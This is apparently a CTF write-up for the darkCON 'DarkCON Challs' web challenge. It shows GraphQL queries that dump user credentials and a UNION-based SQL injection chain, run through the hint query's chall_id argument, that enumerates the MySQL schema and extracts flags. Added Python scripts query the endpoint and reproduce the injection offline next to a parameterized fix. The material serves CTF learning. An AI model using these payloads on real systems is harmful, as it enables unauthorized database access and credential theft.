はまやんはまやんはまやん

hamayanhamayan's blog

DarkCON Challs [darkCON CTF]

CTFtime.org / darkCON CTF

Below is the authentication process (the client-side JavaScript behind the login page). GraphQL is in use, so first do the usual extraction of what the endpoint exposes.

// Login handler from the page's client-side JS. Note what it does with the
// credentials: the "auth" cookie is just base64(username + ":" + password).
function auth() {
    var username = document.getElementById("Username").value;
    var password = document.getElementById("Password").value;
    var head = btoa(username + ':' + password);
    $(document).ready(function() {
        // The query is POSTed form-encoded (jQuery $.post with an object body),
        // with the credentials spliced straight into the GraphQL document.
        $.post("graphql", {
            "query": "mutation{login(username:\"" + username + "\",password:\"" + password + "\")}"
        }, function(data, textStatus) {
            if (data.data.login == "Success") {
                document.cookie = "auth=" + head;
                window.location = '/dashboard'
            } else {
                alert('Wrong creds')
            }
        }, "json");
    });
}
// Guest login: a hardcoded cookie. "Z3Vlc3Q6a2FybWE5ODc0" is base64("guest:karma9874").
function yeet() {
    document.cookie = "auth=Z3Vlc3Q6a2FybWE5ODc0";
    window.location = "/dashboard"
}

mutation{login(username:"admin",password:"password")}

query{Challs{}}
-> Authorization Error

query{allUsers{username password}}
-> 
{"data":{"allUsers":[{"username":"guest","password":"karma9874"},{"username":"admin","password":"is_this_visible_to_you?"}]}}
ok.
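As an added example (mine, not a script from the original writeup): a small Python helper for the "usual extraction" step and for building the compact queries used above. I am assuming that extraction is a GraphQL introspection query; the sample introspection reply below is constructed to match the operations this writeup actually uses (login, Challs, allUsers, hint) and is not a capture from the challenge server. `send_query` mirrors the client's form-encoded `$.post("graphql", {query: ...})`, `auth_cookie` mirrors its cookie construction, and the base URL is whatever the challenge host was.

```python
import base64
import json
import urllib.parse
import urllib.request

# Introspection query for the top-level query/mutation fields and their arguments.
INTROSPECTION_QUERY = (
    "query{__schema{"
    "queryType{fields{name args{name type{name kind ofType{name kind ofType{name}}}}}}"
    "mutationType{fields{name args{name type{name kind ofType{name kind ofType{name}}}}}}"
    "}}"
)

# Constructed sample reply (assumption: shaped after the operations used in this
# writeup; not captured from the challenge server).
SAMPLE_RESPONSE = json.dumps({"data": {"__schema": {
    "queryType": {"fields": [
        {"name": "Challs", "args": []},
        {"name": "allUsers", "args": []},
        {"name": "hint", "args": [{"name": "chall_id", "type": {
            "name": None, "kind": "NON_NULL",
            "ofType": {"name": "String", "kind": "SCALAR", "ofType": None}}}]},
    ]},
    "mutationType": {"fields": [
        {"name": "login", "args": [
            {"name": "username", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
            {"name": "password", "type": {"name": "String", "kind": "SCALAR", "ofType": None}},
        ]},
    ]},
}}})


def type_name(t):
    """Reduce an introspection type object to a short signature such as String!
    (NON_NULL becomes '!', LIST wrappers are flattened to the element type)."""
    non_null = False
    while t is not None and t.get("name") is None:
        if t.get("kind") == "NON_NULL":
            non_null = True
        t = t.get("ofType")
    return (t["name"] if t else "?") + ("!" if non_null else "")


def list_operations(response_text):
    """Map each root field to its argument signatures:
    {"query": {"hint": ["chall_id: String!"], ...}, "mutation": {...}}."""
    schema = json.loads(response_text)["data"]["__schema"]
    ops = {}
    for kind, key in (("query", "queryType"), ("mutation", "mutationType")):
        root = schema.get(key) or {"fields": []}
        ops[kind] = {
            f["name"]: [f"{a['name']}: {type_name(a['type'])}" for a in f.get("args", [])]
            for f in root["fields"]
        }
    return ops


def build_query(op, selection, args=None, kind="query"):
    """Compact query form used throughout this writeup, e.g.
    build_query("hint", ["take_hint"], {"chall_id": "35"}) -> query{hint(chall_id:"35"){take_hint}}"""
    arg_str = "(" + ",".join(f"{k}:{json.dumps(v)}" for k, v in args.items()) + ")" if args else ""
    sel = "{" + " ".join(selection) + "}" if selection else ""
    return f"{kind}{{{op}{arg_str}{sel}}}"


def auth_cookie(username, password):
    """The client's cookie scheme: auth=base64(username:password)."""
    return "auth=" + base64.b64encode(f"{username}:{password}".encode()).decode()


def send_query(base_url, query, cookie=None):
    """POST the query form-encoded, like the page's $.post("graphql", {query: ...}).
    Network use is up to the caller; nothing in this file calls it on import."""
    body = urllib.parse.urlencode({"query": query}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/graphql", data=body)
    if cookie:
        req.add_header("Cookie", cookie)
    with urllib.request.urlopen(req) as resp:
        return json.loads(resp.read().decode())


if __name__ == "__main__":
    # Offline walk-through on the constructed reply.
    print(list_operations(SAMPLE_RESPONSE))
    print(build_query("allUsers", ["username", "password"]))
    print(auth_cookie("guest", "karma9874"))
```

With a live target the flow is `send_query(base, INTROSPECTION_QUERY)`, `list_operations(...)` on the reply, then `send_query(base, build_query("allUsers", ["username", "password"]))` and `auth_cookie("admin", <password>)` for the dashboard.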

The admin password came out, so log in with it for now. (Per the client code the auth cookie is just base64(username:password); the hardcoded guest cookie decodes to guest:karma9874, exactly the guest row above.) With admin privileges, go back to poking at GraphQL.

query{Challs{id title flag{chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","flag":{"chall_flag":"<REDACTED>"}}

Try Harder, huh...

query{Challs{id title description category author points flag{chall_id chall_title chall_flag}}}
->
{"id":"35","title":"DarkCON Challs","description":"\"A place where you can see all the challs of darkCON CTF using api but not the flag or can you @_@ ?\r\nPS :- Try to get the flag of this chall xD\"","category":"Web","author":"Karma","points":500,"flag":{"chall_id":"35","chall_title":"DarkCON Challs","chall_flag":"<REDACTED>"}}

Hmm...

query{hint(chall_id:"35"){chall_id chall_title take_hint}}
-> nothing much...

Wait, SQLi?

query{hint(chall_id:"x"){chall_id chall_title take_hint}}
-> ER_BAD_FIELD_ERROR: Unknown column 'x' in 'where clause'

query{hint(chall_id:"'"){chall_id chall_title take_hint}}
ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Here we go. "Unknown column 'x'" means the value lands in the WHERE clause unquoted (something like WHERE chall_id = <value>), so there is no quote to break out of; the payload can start straight with -1 union.

query{hint(chall_id:"-1 union select 1,2,3"){chall_id chall_title take_hint}}

Now the three fields come back as 1, 2, 3. OK. The SELECT evidently has three columns (chall_id, chall_title, take_hint); -1 matches no real row, so only the UNION row is returned, and whatever goes in the first column shows up as chall_id.

query{hint(chall_id:"-1 union SELECT GROUP_CONCAT(distinct TABLE_SCHEMA),2,3 FROM INFORMATION_SCHEMA.TABLES"){chall_id chall_title take_hint}}
-> darkcon,information_schema,mysql,performance_schema,sys

query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct table_name),2,3 from information_schema.tables where TABLE_SCHEMA='darkcon'"){chall_id chall_title take_hint}}
-> challs,flags,hints,users

query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='challs'"){chall_id chall_title take_hint}}
-> challs: id,category,title,description,author,points

query{hint(chall_id:"-1 union select GROUP_CONCAT(column_name),2,3 from information_schema.columns where table_name='flags'"){chall_id chall_title take_hint}}
-> flags: chall_id,chall_title,chall_flag

query{hint(chall_id:"-1 union select GROUP_CONCAT(distinct chall_flag),2,3 from flags"){chall_id chall_title take_hint}}
-> darkCON{fake_flag},darkCON{w0ww_y0u_re411y_f0und_m3}

Couldn't submit it, but this has to be right. ok. darkCON{w0ww_y0u_re411y_f0und_m3}
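As an added example (mine, not the challenge's server code, which the writeup never shows): the same UNION-based chain as above run offline against a constructed SQLite stand-in for the darkcon database, beside the parameterized query that would have stopped it. The resolver shape is an assumption inferred from the errors: a three-column SELECT on hints with chall_id spliced into the WHERE clause unquoted. SQLite has no information_schema, so the table/column enumeration steps use sqlite_master and pragma_table_info instead of the MySQL queries in the writeup; the rows and flags are made up.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the darkcon schema recovered in the writeup
    (hints and flags only, SQLite instead of MySQL). Sample rows are made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE hints(chall_id INTEGER, chall_title TEXT, take_hint TEXT);
        CREATE TABLE flags(chall_id INTEGER, chall_title TEXT, chall_flag TEXT);
        INSERT INTO hints VALUES (35, 'DarkCON Challs', 'look closer at the api');
        INSERT INTO flags VALUES (1,  'Warmup',         'darkCON{constructed_flag_one}');
        INSERT INTO flags VALUES (35, 'DarkCON Challs', 'darkCON{constructed_flag_two}');
    """)
    return conn


def hint_vulnerable(conn, chall_id):
    """Assumed shape of the hint resolver: the argument is spliced into the
    WHERE clause unquoted (consistent with "Unknown column 'x'" for chall_id:"x")."""
    sql = ("SELECT chall_id, chall_title, take_hint FROM hints "
           f"WHERE chall_id = {chall_id}")
    return conn.execute(sql).fetchall()


def hint_safe(conn, chall_id):
    """Same query with a bound parameter: the input can only ever be a value,
    never SQL. "35" still matches (column affinity converts it), payloads do not."""
    sql = "SELECT chall_id, chall_title, take_hint FROM hints WHERE chall_id = ?"
    return conn.execute(sql, (chall_id,)).fetchall()


def probe(conn, chall_id):
    """Error-based probing step from the writeup: the DB error text, or None if it ran."""
    try:
        hint_vulnerable(conn, chall_id)
        return None
    except sqlite3.Error as e:
        return str(e)


def dump_via_union(conn):
    """The writeup's enumeration chain (tables -> columns -> data), adapted from
    MySQL's information_schema to SQLite's sqlite_master / pragma_table_info.
    Every payload keeps the three-column shape the probe established."""
    tables = hint_vulnerable(
        conn, "-1 union select group_concat(name),2,3 from sqlite_master where type='table'")[0][0]
    columns = hint_vulnerable(
        conn, "-1 union select group_concat(name),2,3 from pragma_table_info('flags')")[0][0]
    flags = hint_vulnerable(
        conn, "-1 union select group_concat(distinct chall_flag),2,3 from flags")[0][0]
    return tables.split(","), columns.split(","), flags.split(",")


if __name__ == "__main__":
    db = make_db()
    print(probe(db, "x"))                      # column-name error: unquoted splice
    print(probe(db, "'"))                      # syntax error: no quote to balance
    print(hint_vulnerable(db, "-1 union select 1,2,3"))
    print(dump_via_union(db))
    print(hint_safe(db, "-1 union select 1,2,3"))  # [] with the bound parameter
```

The MySQL equivalents of the three enumeration payloads are the ones shown above in the writeup (GROUP_CONCAT over INFORMATION_SCHEMA.TABLES / COLUMNS, then over flags); only the catalog tables differ.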